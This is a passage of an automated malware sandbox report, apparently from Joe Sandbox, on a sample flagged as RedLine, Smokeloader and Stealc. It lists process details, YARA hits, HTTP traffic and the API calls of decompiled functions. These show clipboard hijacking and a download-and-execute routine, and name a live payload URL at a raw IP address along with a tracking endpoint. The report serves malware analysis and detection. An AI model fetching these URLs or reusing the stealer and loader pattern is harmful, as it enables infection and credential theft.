2024-12-10 14:12:16 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 14:12:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y01opcjkt9RjiOcg31wKfDM7Z7CDM1GQ8iUF3twG%2BGWYEZf8s0m%2B%2FCIlnCl53YKpMqLIbyAoW5ID64Dn48AjymrOlSH%2BDzZR1ZMst%2FG%2Fz9L1Vi%2B3WAprSOZU9t4Z83RGCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efdd42f6bdc430d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2869&min_rtt=2420&rtt_var=1228&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1206611&cwnd=225&unsent_bytes=0&cid=e4eec5e7b4671bf2&ts=1196&x=0"
2024-12-10 14:12:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 14:12:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:12:09
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\7gxaFDUSOD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7gxaFDUSOD.exe"
Imagebase:	0x400000
File size:	429'568 bytes
MD5 hash:	4C632322BFF9D2562EBF7783CC411DB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:12:17
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe"
Imagebase:	0x400000
File size:	303'616 bytes
MD5 hash:	D8CE5C15818144C17BBB3BF250494439
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000003.1537789026.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:12:53
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 1316
Imagebase:	0x6c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.6%
Total number of Nodes:	765
Total number of Limit Nodes:	22

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
<, xrefs: 00402B45
ShareScreen, xrefs: 00402A12

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 009A9FB6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009A9FDE
Module32First.KERNEL32(00000000,00000224), ref: 009A9FFE

Memory Dump Source

Source File: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a9000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: fff90a68a5e0b120b16c2d49f7ac3d83e3195b899dfa1628f4d08034175b3a0d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 4CF062362007156FDB203AB59C8DB6B76ECFF4A725F100529E647D14C0DB70EC458AA1

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D

Strings

cess, xrefs: 0247018D
kernel32.dll, xrefs: 0247008F, 02470095

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
